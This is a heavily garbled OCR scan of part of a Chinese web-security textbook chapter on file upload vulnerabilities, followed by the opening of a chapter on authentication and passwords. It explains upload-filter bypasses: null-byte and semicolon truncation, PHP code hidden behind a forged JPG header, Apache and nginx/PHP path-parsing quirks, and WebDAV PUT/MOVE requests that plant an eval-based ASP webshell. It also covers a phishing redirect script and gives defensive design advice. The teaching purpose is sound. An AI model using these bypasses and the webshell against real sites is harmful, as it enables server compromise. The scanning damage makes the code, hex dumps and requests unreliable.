制 的 0x00 字 符 ，.JPG 绕 过 了 应 用 的 上 传 文件 类 型 判断 ， 但 对 于 服务 器 
妆 来 说 ， 此 文件 因为 0 字 厄 截断 的 关系 ， 最 终 却 会 变 成 xxx.php。%00 字 
符 截 断 的 问题 不 只 在 上 传 文件 漏洞 中 有 所 利用 ， 因 为 这 是 一 个 被 广泛 
用 于 字符 串 处 理 函 数 的 保留 字符 ， 因 此 在 各 种 不 同 的 业务 逻辑 中 都 可 
能 出 现 问题 ， 需 要 引起 重视 。 

除了 第 见 的 检查 文件 名 后 组 的 方法 外 ， 有 的 应 用 ， 还 会 通过 判断 上 传 
文件 的 文件 头 来 验证 文件 的 类 型 o 

比如 一 个 JPG 文 件 ， 其 文件 头 是 : 


rds FFEO 0010 4446 4946 0001 0100 0001 f} —..JFIF...... 
00010 0001 0000 FFFE 003E 4352 4541 544F 5232 .... .>CREATOR: 
00020 2067 642D 6A70 6567 2076 312E 3020 2875 gd-jpeg v1.0 {u 
00030 7369 6E67 2049 4447 204A 5045 4720 7636 sing IJG JPEG v6 
00040 3229 2C20 6465 6661 756C 7420 7175 616C 2), default qual 
00050 6974 790A FFDB 0043 0008 0606 0706 0508 ity. .C........ 


JPG 文 件 的 文件 头 

在 正常 情况 下 ， 通 过 判断 前 10 个 字 方 ， 基 本 上 就 能 判断 出 一 个 文件 的 
真实 类 型 。 

浏览 器 的 MIME Sniff 功 能 实际 上 也 是 通过 读 取 文件 的 前 256 个 字 节 ， 来 
判断 文件 的 类 型 的 。 

因此 ， 为 了 绕 过 应 用 中 类 似 MIME Sniff 的 功能 ， 常 见 的 攻击 技巧 是 伪 
造 一 个 合法 的 文件 头 ， 而 将 真实 的 PHP 等 脚本 代码 附 在 合法 的 文件 头 之 


00000 FFDS FFEO 0010 4446 4946 0001 0100 0001 SOSUFIE...... 
BBBIO 0001 0000 FFFE O03E 4352 4541 544F 523A | .... ->CREATOR: 


00020 2067 642D 6A70 6567 2076 312E 3020 2875 gd-jpeg vi.O (u 
OOOSO 7369 6E67 2049 4447 2048 5045 4720 7636 sing IJG JPEG v6 
00040 3229 2020 6465 6661 756C 7420 7175 616C 2), default qual 
00050 6974 7904 FFDB 0043 0008 0606 0706 0508 ity. Col. acca 


Seley) Skoki 
00070 HAE 工业 1E1D 1A1C 
O0080 222C 231C 1C28 3729 2C30 3134 3434 1F27 ",#..(7),01444.' 


00090 393D 3832 3C2E 3334 32FF DBOO 4301 0909 9=82<.342 a Grater’ 

隐藏 在 JPG 文 件 中 的 PHP 代 码 

但 此 时 ， 仍 需要 通过 PHP 来 解释 此 图 片 文件 才 行 。 

如 下 情况 ， 因 为 Web Server 将 此 文件 名 当做 PHP 文 件 来 解析 ， 因 此 PHP 
代码 会 执行 ， 车 上 传 文 件 后 级 是 .JPG， 则 Web Server 很 有 可 能 会 将 此 文 
件 当 做 静态 文件 解析 ， 而 不 会 调用 PHP 解 释 器 ， 攻 击 的 条 件 无 法 满足 。 


<?php phpinfo(); 


€> C Oma cnt php 
€ OIF @)CREATOR: gd-jpeg vi. 0 (using JG JPEG v62), default quality 9C 


phpinfo() 页 面 
在 某 些 特 定 环境 下 ， 这 个 伪造 文件 头 的 技巧 可 以 收 到 奇效 。 


8.2 ”功能 还 是 漏洞 

在 文件 上 传 漏洞 的 利用 过 程 中 ， 攻 击 者 发 现 一 些 和 Web Server 本 号 特性 
相关 的 功能 ， 如 果 加 以 利用 ， 束 会 变 成 威力 巨大 的 武 颖 。 这 往往 是 因 
为 应 用 的 开发 者 没有 深入 理解 Web Server] HE T5 Pr Er E o 

8.2.1 Apache 文件 解析 问题 

比如 在 Apache 1.x、2.x 中 ， 对 文件 名 的 解析 就 存在 以 下 特性 。 
Apache 对 于 文件 名 的 解析 是 从 后 往 前 解析 的 ， 直 到 遇见 一 个 Apache 认 
RERBA HEA 

EN Apache MH. jar 这 个 文件 类 型， 所 以 会 一 直 过 历 后 缀 到 .php， 然 
后 认为 这 是 一 个 PHP 类 型 的 文件 。 

那么 Apache 怎 么 知道 哪些 文件 是 它 所 认识 的 呢 ? 这 些 文件 类 型 定义 在 
Apache 的 mime.types 文 件 中 ° 


This file controls what Internet media types are sent to the client for 
given file extension(s). Sending the correct media type to the client 

is important so they know how to handle the content of the file. 

Extra types can either be added here or by using an AddType directive 

in your config files. For more information about Internet media types, 
please read RFC 2045, 2046, 2047, 2048, and 2077. The Internet media type 
registry is at «http://www.iana.org/assignments/media-types/». 


8 
8 
8 
HX # 
# 
# 
# 


# MIME type Extensions 
application/activemessage 
application/andrew-inset ez 
application/applefile 

application/ atomtxml atom 
application/atomceat+xml atomcat 
application/atomicmail 
application/atomsvce+xml atomsyc 


application/auth-policy+xml 
application/batch-smtp 
application/beeptxml 
application/cals-1840 
application/ccxml4xml ecxml 
application/cellml+xml 
application/cnrptxml 
application/commonground 
application/conference-info+xml 
application/cpl+xml 
application/cstatxml 
application/cstadatatxml 
application/cybercash 
application/davmount+xml davmount 


Apache httpd server 的 mime.types 文 件 


Apache 的 这 个 特性 ， 很 多 工程 师 在 写 应 用 时 并 不 知道 ， 即 便 知道 ， 可 
能 有 的 工程 师 也 会 认为 这 是 Web Server 该 负责 的 事情 。 如 果 不 考 虑 这 些 
因素 ， 写 出 的 安全 检查 功能 可 能 束 会 存在 缺陷 。 比 如 .rar 是 一 个 合法 的 
上 传 需求 ， 在 应 用 里 只 判断 文件 的 后 缀 是 否 是 .rar， 最 终 用 户 上 传 的 是 
php-shell.php.rarrarrar， 从 而 导致 脚本 被 执行 。 

如 果 要 指定 一 个 后 级 作为 PHP 文 件 解析 ， 在 Apache 的 官方 文档 里 是 这 
样 摘 述 的 ; 


Apache parse .php files as PHP. Instead of 
only using the Apache AddType 


directive, we want to avoid potentially 
dangerous uploads and created 
files such as exploit.php.jpg from being 
executed as PHP. Using this 


example, you could have any extension(s) 
parse as PHP by simply addin 
them. We'll add .phtml to demonstrate 
«FilesMatch \.php$> 
SetHandler application/x-httpd-php 
</FilesMatch> 


8.2.2 _ IIS 文件 解析 问题 

IIS 6 在 处 理 文件 解析 时 ， 也 出 过 一 些 漏洞 。 前 面 提 到 的 0x00 字 符 截 断 
文件 名 ， 在 IS 和 Win-dows 环 境 下 曾经 出 过 非常 类 似 的 漏洞 ， 不 过 截断 
字符 变 成 了 分 号 “;”。 

当 文 件 名 为 abc.asp;xx.jpg 时 ，IIS 6 会 将 此 文件 解析 为 abc.asp， 文 件 名 被 
截断 了 ， 从 而 导致 脚本 被 执行 。 比 如 : 

会 执行 xyz.asp， 而 不 会 管 abc.jpg 

除 此 漏洞 外 ， 在 IS 6 中 还 曾经 出 过 一 个 漏洞 因为 处 理 文 件 夹 扩展 
a 导致 将 /*.asp/ 目 孙 下 的 所 有 文件 都 作为 ASP 文 件 进 行 解 析 。 比 


这 个 abc.jpg， 会 被 当做 ASP 文 件 进行 解析 。 
注意 这 两 个 IIS 的 漏洞 ， 是 需要 在 服务 器 的 本 地 硬盘 上 确实 存在 这 样 的 
各 只 是 通过 Web 应 用 有 映 射出 来 的 URL， 则 是 无 法 触发 


p D Nm 也 许 今 天 还 能 在 互联 网 中 找到 不 少 未 修补 漏 
洞 的 网 站 。 

Te PUUS, 就 不 得 不 谈 在 IIS 中 ， 支 持 PUT 功 能 所 导致 的 若干 上 传 脚本 间 
题 o 

PUT 是 在 WebDav 中 定义 的 一 个 方法 。Web-Dav 大 大 扩展 了 HTTP 协 议 中 
GET、POST、HEAD 等 功能 ， 它 所 包含 的 PUT 方法 ， 人 允许 用 户 上 传 文 
件 到 指定 的 路 径 下 。 

在 许多 Web Server 中 ， 默 认 都 禁用 了 此 方法 ， 或 者 对 能 够 上 传 的 文件 类 
型 做 了 严格 限制 。 但 在 1S 中， 如果 目 录 支 持 写 权限 ， 同 时 开启 了 
WebDav， 则 会 支持 PUT 方 法 ， 再 结合 MOVE 方 法 ， 束 能 够 将 原本 只 介 
许 上 传 文本 文件 改写 为 脚本 文件 ， 从 而 执行 webshell。MOVE 能 否 执行 
成 功 ， 取 决 于 11S 服务器 是 否 义 选 了 “脚本 资源 访问 * 复 选 框 

一 般 要 实施 此 攻击 过 程 ， 攻 击 者 应 先 通过 OP-TIONS 方 法 探测 服务 器 支 
持 的 HTTP 方 法 类 型 ， 如 果 支 持 PUT， 则 使 用 PUT 上 传 一 个 指定 的 文本 
文件 ， 最 后 再 通过 MOVE 改 写 为 脚本 文件 。 


A 


第 一 步 : 通过 OPTIONS 探 测 服务 器 信息 。 


OPTIONS / HTTP/1.1 
Host: www 


返回 : 


Dii cr Pot. pont. Cor Moni perce. 


LET. COPY, MOVE, PROPPIND. PIROPPIOCH. 
SEARO MIICOR, LOCK UNLOCK 


Me Comi yom 


PF: ERENT o 


PUT /test.txt HTTP/L.1 
Host: www dtp 
Content-Length: 26 

«S eval(request( "cmd" ht> 


返回 : 


aks ANP 


Come Le 
we CY MME, Prone 


成 功 创建 文件 。 
第 三 步 : 通过 MOVE 改 名 。 


HTTP/I.I 201 Created 

Date: Fri, 01 Jan 2010 08:09:18 GMT 
Server: Microsoft-118/6,0 

X-Powered-By; ASP.NET 

Location: http.//www MENNIBÉND hell asp 


Content-Type: text/xml 
Content-Length; 0 


修改 成 功 。 

内 的 安全 人 研究 者 zwell 曾 经 写 过 一 个 上 自动 化 的 扫 摘 工具 “IIS PUT 
Scanner"， 以 帮助 检测 此 类 问题 。 

从 攻击 原理 看 ，PUT 方 法 造成 的 安全 漏洞 ， 都 是 由 于 服务 器 配置 不 当 
造成 的 。 WebDav 给 管理 员 带 来 了 很 多 方便 ， 但 如 果 不 能 了 解 安 全 的 风 
险 和 细 方 ， 则 等 于 向 黑客 敞开 了 大 门 。 

8.2.3 PHP CGI 路 径 解析 问题 

2010 年 5 月 ， 国 内 的 安全 组 织 80sec 发 布 了 一 个 Nginx 的 漏洞 ， 指 出 在 
Nginx 配 置 fastcgi 使 用 PHP 时 ， 会 存在 文件 类 型 解析 问题 ， 这 将 给 上 传 


漏洞 大 开 方 便 之 | 。 
后 来 人 们 发 现 早 在 2010 年 1 月 时 ， 在 PHP 的 bug tracker. LRA ADIE 
PHP 5.2.12 和 PHP5.3.1 版 本 下 提交 了 这 一 bug 。 


Bug #50852 FastCGI Responder's accept_path_info behavior needs to be optional 


Submitted: 2010-01-27 01:05 UTC Modified: 2010-01-29 00:14 UTC Votes: 2 
From: merlin at merlinsbox dot net Assigned: Avg, Score: 4.5 + 0.5 
Status: Closed Package: CGI related Reproduced: 2 of 2 (100.096) 
PHP Version: 5.*, 6 OS; linux, unix Same Version: 1 (50.096) 
Private report: No CVE-ID: Same OS: 2 (100.096) 


View | Add comment | Comment | Developer | edit 


[2010-01-27 01:05 UTC] merlin at merlinsbox dot net 


Description: 

I setup PHP 5.2.12 and started 5 fastcgi processes on nginx with a basic location directive dispatching all URIs ending 
with the PHP extension to PHP’s fastcgi responder daemon. I also configured it to receive SCRIPT FILENAME (required by 
PHP) as a concatenation of $document root and the matched URI (which must end in’. php’) and PATH INFO as the requested 
URI. No other fastcgi parameters were used. I created a file in the document root thusly: ` 
var dump($ SERVER); ?></pre>" > test.txt . ECCE NACER MES EN 

EA o DUDEN ca, resulting in the following output (truncated for relevence): 


[" SCRIPT_FILENAME" ]=> 

string (31) “/path/to/docunent_root/test. txt" 
[ORIG SCRIPT FILENAME"]-» 

string(3T) “/path/to/docunent_root/test. txt/1. php" 


PHP 官 方 对 此 bug 的 描述 

并 同时 给 出 了 一 个 第 三 方 人 补丁。 

可 是 PHP 官 方 认 为 这 是 PHP 的 一 个 产品 特性 ， 并 未 接受 此 补丁 。 
[2010-01-29 00:14 UTC] joey@php.net 


For the record, I saw cgi.fix pathinfo but didn't really understand 
the documentation on it - probably my fault. The patch was thrown 
together mainly as a personal exercise in understanding the problem 
these folks were reporting — I dE OP E COGI TEEG DES n ET 
into the mainline. 


PHP 官 方 对 此 bug 的 回复 

这 个 漏洞 是 怎么 一 回 事 呢 ? 其 实 可 以 说 它 与 Nginx 本 号 天 系 不 大 ， 
Nginx 只 是 作为 一 个 代理 把 请 求 转发 给 fastcgi Server，PHP 在 后 端 处 理 这 
一 切 。 因 此 在 其 他 的 fastcgi 环 境 下 ，PHP 也 存在 此 问题 ， 只 是 使 用 
Nginx 作 为 Web Server 时 ， 一 般 使 用 fastcgi 的 方式 调用 脚本 解释 器 ， 这 种 
使 用 方式 最 为 常见 。 

这 个 问题 的 外 在 表现 是 ， 当 访 旧 


http://www.xxx.com/path/test.jpg/notexist.php 


时 ， 会 将 test,jpg 当 做 PHP 进 行 解 机 。Notex-ist.php 是 不 存在 的 文件 。 
it: Nginx 的 参考 配置 如 下 。 


location ~ \.php$ { 


I" 


root html 

fastcgi pass 127.0.0.1:9000; 

fastcgi index index.php; 

fastcgi param SCRIPT FILENAME /scripts 
$fastcgi script name; 

include fastcgi params; 


UE. 如 人 在 fEMTAE E Ay fastegik PHP 用 里 上 传 一 张 图 片 (可 能 是 
像 ， 也 可 能 是 论坛 里 上 传 的 图 片 等 ) ， 其 图 片 内 容 是 PHP 文 件 ， 则 将 导 
zo nm 。 其 他 可 以 上 传 的 合法 文件 如 文本 文件 、 压缩 文件 等 情况 
M e 

ME 这 个 漏洞 的 原因 与 “在 fastcgi 方 式 下 ，PHP 获 取 环 境 变 量 的 方式 ”有 


PHP 的 配置 文件 中 有 一 个 关键 的 选项 : cgi.fix_pathinfo， 这 个 选项 默认 
是 开启 的 : 


cgi.fix pathinfo = 1 


在 官方 文档 中 对 这 个 配置 的 说 明 如 下 : 


; cgi.fix_pathinfo provides *real* PATH INFO/ 
PATH TRANSLATED support for CGI. PHP's 

; previous behaviour was to set 

PATH TRANSLATED to SCRIPT FILENAME, and to 
not grok 

; what PATH INFO is. For more information 
on PATH INFO, see the cgi specs. Setting 
; this to 1 will cause PHP CGI to fix it's 
paths to conform to the spec. A setting 

; of zero causes PHP to behave as before. 
Default is 1. You should fix your scripts 
; to use SCRIPT FILENAME rather than 

PATH TRANSLATED. 

cgi.fix pathinfo-i 


TEBREÉJURIBI, MAASE: 一 个 是 PATH INFO, — T^ 
SCRIPT FILENAME » 


在 上 面 的 例子 中 : 


这 个 选项 为 1 时 ， 在 映射 URI 时 ， 将 递归 查询 路 径 确 认 文 件 的 合法 性 。 
notexist.php 是 不 存在 的 ， 所 以 将 往 前 递归 查询 路 径 ， 此 时 触发 的 逻辑 


=I 
XE: 


/* 
* if the file doesn't exist, try to extract 
PATH INFO out 
* of it by stat'ing back through the '/' 
* this fixes url's like /info.php/test 
*/ 


if (script_path_translated && 
(script_path_translated_len = 
strlen(script_path_translated)) > && 
(script | path. ala pe sth translate 
d len-1] -- 
..// 以 下 省 " 


iC f Bt VAY) Be TE ZI e A /info.php/testiX HURL, fete IE TAH, 
解析 到 info.php E ° 

此 时 SCRIPT_FILENAME i 2 iè E Oc fb dk @ fF dp. Pt Lh @ 
是 /path/test.jpg。 而 PATH_INFO 此 时 还 是 notexist.php， 在 最 终 执行 时 ， 
test.jpg 会 被 当做 PHP 进 行 解析 。 


PHP 官 方 给 出 的 建议 是 将 cgi.fix_pathinfo 设置 为 0， 但 可 以 预见 的 是 ， 
官方 的 消极 态度 在 未 来 仍然 会 使 得 许 许多 多 的 “不 知情 者 ”遭受 损失 。 
8.2.4 利用 上 传 文件 钓鱼 

前 面 讲 到 Web Server 的 一 些 “ 功 能 ”可 能 会 被 攻击 者 利用 ， 绕 过 文件 上 传 
功能 的 一 些 安全 检查 ， 这 是 服务 器 端的 事情 。 但 在 实际 环境 中 ， 很 多 
时 候 服务 器 端的 应 用 ， 还 需要 为 客户 端 买 单 。 

钓鱼 网 站 在 传播 时 ， 会 通过 利用 XSS、 服 务 器 端 302 跳 转 等 功能 ， 从 正 
常 的 网 站 跳 转 到 钓鱼 网 站 。 不 小 心 的 用 户 ， 在 一 开始 ， 看 到 的 是 正常 
的 域名 ， PA na RD: 


item i debant, nod 
ide 198182 283d5d7c9443d8. jhtml?c| at=0 


但 这 种 钓鱼 ， 仍然 会 在 URL 中 暴露 真实 的 的 鱼网 站 地 址 细心 点 的 用 
户 可 能 不 会 上 当 。 

而 利用 文件 上 传 功能 ， 钩 鱼 者 可 以 先 将 包含 了 HTML 的 文件 〈 比 如 一 张 
图 片 ) 上 传 到 目标 网 站 ， 然后 通过 传播 这 个 文件 的 URL 进 行 钓鱼 ， 则 
URL 中 不 会 出 现 钓 鱼 地 址 ， 更 具有 欺骗 性 。 


比如 下 面 这 张 图 三: 


http://tech.simba.taobao.com/wp-content/ 
uploads /2011/02/1 E m.jpg? T Ad? 


CE HISEPAA Bice: 


var i=c.s 2")[1]; 
if(i.split(" ")[0]==1){ 

ocation.href= Mie //208.43.120.4../Images/ 
teme.asp?id-' split(" ")[1]; 


e 
ation.hrefz'http://208.43.120.4../Images/ 
e.asp?id='+i.split("_")[1]; 


其 中 png 是 伪造 的 文件 头 用 于 绕 过 上 传 时 的 文件 类 型 检查 ， 接 下 来 
就 是 一 段 脚本 ， 如 果 被 执行 ， 将 控制 浏览 器 跳 向 指定 的 网 站 ， 在 此 是 
一 个 钓鱼 网 站 。 
骗子 在 传播 钓鱼 网 站 时 ， 只 和 需要 传播 合法 图 片 的 URL: 


http://tech.simba.taobao.com/wp-content/ 
uploads/2011/02/item.jpg?1 117 


在 正常 情况 下 ， 浏 蜗 器 是 不 会 将 jpg 文 件 当 做 HTML 执 行 的 ， 但 是 在 低 
版 本 的 正中， 比如 IE 6 和 IE 7， 包 括 IE 8 的 兼容 模式 ， 浏 览 器 都 会 “自作 
聪明 ”地 将 此 文件 当做 HTML 执 行 。 这 个 问题 在 很 早 以 前 就 被 用 来 制作 
网 页 木马 ， 但 微软 一 直 认 为 这 是 浏览 器 的 特性 ， 直 到 IE 8 中 有 了 增强 的 
MIMESniff， 才 有 所 缓解 。 

从 网 站 的 角度 来 说 ， 它 似乎 是 无 率 的 受害 者 ， 但 面临 具体 业务 场景 
时 ， 不 得 不 多 多 考虑 此 类 问题 。 

关于 钓鱼 的 问题 ， 我 们 将 在 后 续 章 节 “ 互 联网 业务 安全 ”中 再 深入 讨 


ib 


833 ”设计 安全 的 文件 上 传 功能 

讲 了 这 么 多 文件 上 传 方面 的 问题 ， 那 么 如 何 才 能 设计 出 安全 的 、 没 有 
缺陷 的 文件 上 传 功能 呢 ? 

本 章 一 开始 就 提 到 ;文件 上 传 功能 本 号 并 没 馆 ;只 是 在 一 些 条 件 下 会 
Ce nee 
Mea SE ds 


1. 文件 上 传 的 目录 设置 为 不 可 执行 


只 要 Web 容 旭 无 法 解析 该 目录 下 的 文件 ， 即 使 攻击 者 上 传 了 脚本 文 
件 ， 服 务 占 本 身 也 不 会 受到 影响 ， 因 此 此 点 至 天 重要 。 在 实际 应 用 
中 ， 很 多 大 型 网 站 的 上 传 应 用 ， 文 件 上 传 后 会 放 到 独立 的 存储 上 ， 做 
静态 文件 处 理 ， 一 方面 方便 使 用 缓存 加 速 ， 降 低 性 能 损耗 ， 另 一 方面 
也 杜绝 了 脚本 执行 的 可 能 。 但 是 对 于 一 些 边 边 角 角 的 小 应 用 ， 如 果 存 
在 文件 上 传 功 能 ， 则 仍 需 要 多 加 关注 。 


1. 判断 文件 类 型 


在 判断 文件 类 型 时 ， 可 以 结合 使 用 MIMEType、 后 绥 检 查 等 方式 。 在 
文件 类 型 检查 中 ， 强 烈 推 荐 白 名 单 的 方式 ， 黑 名 单 的 方式 已 经 无 数 次 
被 证 明 是 不 可 靠 的。 此 外 ， 对 于 图 片 的 处 理 ， 可 以 使 用 压缩 函数 或 者 
resize 函 数 ， 在 处 理 图 片 的 同时 破坏 图 片 中 可 能 包含 的 HTML 代 码 。 


1. 使 用 随机 数 改写 文件 名 和 文件 路 径 


文件 上 传 如 果 要 执行 代码 ， 则 需要 用 户 能 够 访问 到 这 个 文件 。 在 某 些 
环境 中 ， 用 户 能 上 传 ， 但 不 能 访问 。 如 果 应 用 使 用 随机 数 改 写 了 文件 
名 和 路 径 ， 将 极 大 地 增加 攻击 的 成 本 。 与 此 同时 ， 像 shell.php.rarrar 这 
种 文件 ， 或 者 是 crossdo-main.xml 这 种 文件 ， 都 将 因为 文件 名 被 改写 而 
无 法 成 功 实 施 攻 击 。 
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crossdomain.xml、 上 传 包 含 JavaScript 的 XSS 利 用 等 问题 将 得 到 解决 。 
但 能 否 如 此 设置 ， 还 需要 看 具体 的 业务 环境 。 

文件 上 传 问 题 ， 看 似 人 简单 ， 但 要 实现 一 个 安全 的 上 传 功能 ， 殊 为 不 
易 。 如 采 还 要 考虑 到 病毒 、 木 马 、 色 情 图 片 与 视频 、 反 动 政 治文 件 等 
与 具体 业务 结合 更 紧密 的 问题 ， 则 需要 做 的 工作 就 更 多 了 。 不 断 地 发 
现 问题 ， 结 合 业 务 需 求 ， 才 能 设计 出 最 合理 、 最 安全 的 上 传 功能 。 


8.4 ”小 结 

在 本 章 中 ， 我 们 介绍 了 Web 安 全 中 的 文件 上 传 漏洞 。 文 件 上 传 本 来 是 
一 个 正常 的 功能 ， 但 黑客 们 利用 这 个 功能 就 可 以 跨越 信任 边界 。 如 果 
应 用 缺乏 安全 检查 ， 或 者 安全 检查 的 实现 存在 问题 ， 就 极 有 可 能 导致 
严重 的 后 果 。 

文件 上 传 往 往 与 代码 执行 联系 在 一 起 ， 因 此 对 于 所 有 业务 中 要 用 到 的 
上 传 功 能 ， 都 应 该 由 安全 工程 师 进 行 严格 的 检查 。 同 时 文件 上 传 又 可 
能 存在 诸如 钓鱼 、 木 马 病毒 等 危害 到 最 终 用 户 的 业务 风险 问题 ， 使 得 
我 们 在 这 一 领域 需要 考虑 的 问题 越 来 越 多 。 


第 9 章 “认证 与 会 话 管理 

“认证 "是 最 容易 理解 的 一 种 安全 。 如 果 一 个 系统 缺乏 认证 手段 ， 明 眼 
人 都 能 看 出 来 这 是 “不 安全 的 。 最 常见 的 认证 方式 就 是 用 户 名 与 密 
簿 ， 但 认证 的 手段 却 远 远 不 止 于 此 。 厅 章 将 介绍 Web 中 常见 的 认证 手 
段 ， 以 及 一 些 需要 注意 的 安全 问题 


9.1 Who am I? 

很 多 时 候 ， 人 们 会 把 “认证 > 和 “授权 ”两 个 概念 搞 混 ， 甚 至 有 些 安 全 工 

程 师 也 是 如 此 。 实 际 上 “认证 > 和 “授权 ”是 两 件 事情 ， 认 证 的 英文 是 

Authentication, ， 授 权 则 是 Authorization 。 分 清楚 这 两 个 概念 其 实 很 简 

单 ， 只 需要 记 住 下 面 这 个 事实 : 

目的 是 为 了 认 出 用 户 是 谁 ， 而 授权 的 目的 是 为 了 决定 用 户 能 够 
人 o 

形象 地 说 ， 假 设 系统 是 一 间 屋 子 ， 持 有 钥匙 的 人 可 以 开门 进入 屋子 ， 

那么 屋子 就 是 通过 “ 锁 和 钥匙 的 匹配 ”来 进行 认证 的 ， 认 证 的 过 程 束 是 

开锁 的 过 程 。 

钥匙 在 认证 过 程 中 ， 被 称 为 “ 任 证 ”〈Creden-tial) ， 开 门 的 过 程 ， 在 互 

联网 里 对 应 的 是 登录 (Login) ° 

可 是 开门 之 后 ， 什 么 事情 能 做 ， 什 么 事情 不 能 做 ， 就 是 “授权 ”的 管辖 

范围 了 。 

如 果 进 来 的 是 屋子 的 主人 人， 那么 他 可 以 坐 在 沙发 上 看 电视 ， 也 可 以 进 

到 卧 宝 睡觉 ， 可 以 做 任何 他 想 做 的 事情 ， 因 为 他 具有 屋子 的 “最 高 权 

限 ”。 可 如 果 进 来 的 是 客人 ， 那 么 可 能 就 仅仅 被 允许 坐 在 沙发 上 看 电 

视 ， 而 不 允许 其 进入 卧室 了 。 

可 以 看 到 , “能 否 进入 卧室 ”这 个 权限 被 授予 的 前 提 ， 是 需要 识别 出 来 

者 到 撒 是 主人 还 是 客人 ， 所 以 如 何 授权 是 取决 于 认证 的 。 

现在 问题 来 了 ， 持 有 钥匙 的 人 ， 真 的 承 是 主人 吗 ? 如 果 主 人 把 钥匙 弄 
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这 些 异常 情况 ， 束 是 因为 认证 出 现 了 问题 ， 系 统 的 安全 直接 受到 了 威 

胁 。 认 证 的 手段 是 多 样 化 的 ， 其 目的 就 是 为 了 能 够 识别 出 正确 的 人 。 

如 何 才 能 准确 地 判断 一 个 人 是 谁 呢 ?这 是 一 个 哲学 问题 ， 在 个 哲学 家 

们 搞 清 楚 之 前 ， 我 们 只 能 够 依据 人 的 不 同 “ 人 年 证 ”来 确定 一 个 人 的 号 

份 。 钥 是 仅仅 是 一 个 很 脆弱 的 凭证 ， 其 他 诸如 指纹、 虹膜 、 人 脸 、 声 

音 等 生物 特征 也 能 够 作为 识别 一 个 人 的 和 凭证。 认证 实际 上 束 是 一 个 验 

证 凭证 的 过 程 。 

如 果 只 有 一 个 凭证 被 用 于 认证 ， 则 称 为 * 单 因素 认证 >” 如果 有 两 个 或 

多 个 凭证 被 用 于 认证 ， 则 称 为 “ 双 因 素 (Two Factors) 认证 ”或 “多 因素 

认证 ”。 一 般 来 说 ， 多 因素 认证 的 强度 要 高 于 单 因 素 认 证 ， 但 是 在 用 户 

体验 上 ， 多 因素 认证 或 多 或 少 都 会 带 来 一 些 不 方便 的 地 方 。 


9.2 ”密码 的 那些 事 儿 
密码 是 最 常见 的 一 种 认证 手段 ， 持 有 正确 密码 的 人 被 认为 是 可 信 的 。 
长 期 以 来 ， 桌 面 软件 、 互 联网 都 普遍 以 密码 作为 最 基础 的 认证 手段 。 


密码 的 优点 古 使 用 成 本 低 ， 认 证 过 程 实现 起 来 很 镜 单 ， 缺点 十 密码 认 
证 是 一 种 比较 弱 的 安全 方案 ， 可 能 会 被 猜 解 ， 要 实现 一 个 足够 安全 的 
密码 认证 方案 ， 也 不 是 一 件 轻松 的 事情 。" 密 码 强度 "是 设 计 密 码 认 证 
方案 时 第 一 个 需要 考虑 的 问题 。 在 用 户 窗 码 强度 的 选择 上 ， 每 个 网 站 
都 有 目 己 的 策略 。 


s: [ee | « 密码 不 能 为 9 位 以 下 纯 数 字 
确认 密码 : | 
注册 页 面 的 密码 强度 要 求 
一 般 在 用 户 注册 时 ， Da A a 
密码 | eeeeeeee | 6-16 个 字符 区 分 大 小 写 ; 不 能 为 9 位 以 下 纯 数字 
确认 密码 : | 


注册 页 面 的 密码 强度 要 求 

目前 并 没有 一 个 标准 的 密码 策略 ， 但 是 根据 OWASP 椎 荐 的 一 些 最 佳 实 
践 ， 我 们 可 以 对 密码 策略 稍 作 总 结 。 

密码 长 度 方面 : 


。 普通 应 用 要 求 长 度 为 6 位 以 上 ; 
e 重要 应 用 要 求 长 度 为 8 位 以 上 ， 并 考虑 双 因 素 认证 。 


。 密码 区 分 大 小 写字 母 ; 
。 密 码 为 大 写字 母 、 小 写字 母 、 数 字 、 特 殊 符号 中 两 种 以 上 的 组 


。 不 要 有 连续 性 的 字符 ， 比 如 1234abcd， 这 种 字符 顺 着 人 的 思路 ， 
所 以 很 容易 猜 解 ; 


。 尽量 避免 出 现 重复 的 字符 ， 比 如 1111。 


除了 OWASP 推 荐 的 策略 外 ， 还 需要 注意 ， 不 要 使 用 用 户 的 公开 数据 ， 
或 者 是 与 个 人 隐私 相关 的 数据 作为 密码 。 比 如 不 要 使 用 QQ 号 、 身 份 证 
号 码 、 有 上 昵称、 电话 号 码 ( 含 手机 号 码 ) 、 生 日 、 英 文 名 、 公 司 名 等 作 
为 密码 ， 这 些 资料 往往 可 以 从 互联 网 上 获得 ， 并 不 是 那么 保密 。 

微 博 网 站 Twitter 在 用 户 注册 的 过 程 中 ， 列 出 了 一 份 长 达 300 个 单词 的 弱 
密码 列表 ， 如 果 用 户 使 用 的 密码 被 包含 在 这 个 列表 中 ， 则 会 提示 用 户 
此 密码 不 安全 。 

目前 黑客 们 常用 的 一 种 暴力 破解 手段 ， 不 是 破解 密码 ， 而 是 选择 一 些 
弱 口 令 ， 比 如 123456， 然 后 猜 解 用 户 和 名， 直到 发 现 一 个 使 用 弱 口 令 的 
账户 为 止 。 由 于 用 户 名 往往 是 公开 的 信息 ， 攻 击 者 可 以 收集 一 份 用 户 
很 多 。 

密码 的 保存 也 有 一 些 需 要 注意 的 地 方 。 一 般 来 说 ， 密 码 必 须 以 不 可 逆 
的 加 密 算法 ， 或 者 是 单 向 散 列 函数 算法 ， 加 密 后 存储 在 数据 库 中 。 这 
样 做 是 为 了 尽 最 大 可 能 地 保证 密码 的 私密 性 。 即 使 是 网 站 的 管理 人 
员 ， 也 不 能 够 看 到 用 户 的 密码 。 在 这 种 情况 下 ， 黑 客 即使 和 人 侵 了 网 
站 ， 导 出 了 数据 库 中 的 数据 ， 也 无 法 获取 到 密码 的 明文 。 

2011 年 12 月 ， 国 内 最 大 的 开发 者 社区 CSDN 的 数据 库 被 黑客 公布 在 网 
上 。 令 人 震惊 的 是 ，CSDN 将 用 户 的 密码 明文 保存 在 数据 库 中 ， 致 使 
600 万 用 户 的 密码 被 泄露 。 明 文保 存 密码 的 后 果 很 严重 ， 黑 客 们 曾经 利 
用 这 些 用 户 名 与 密码 ， 党 试 登录 了 包括 QQ、 人 人 网 、 新 浪 微 博 、 支 付 
宝 等 在 内 的 很 多 大 型 网 站 ， 致 使 数 以 万 计 的 用 户 处 于 风险 中 。 


This is the new and improved version of md5 engine.If you put an md5 hash in it will search for it and if found 
will get the result. This is the beta 0.23 of this engine. You can see the queue ofthe hashes here. Bots will run 
thourgh the queue and use various techniques to crackthe hashes. 


enter your hash here... 


Security question, please solve 


ing de Homo 


The value of 1d5920f4b44b27 a802bd77c4f0536f5a resolves to -> google.com 


一 个 提供 彩虹 表 人 查询 的 MD5 破 解 网 站 

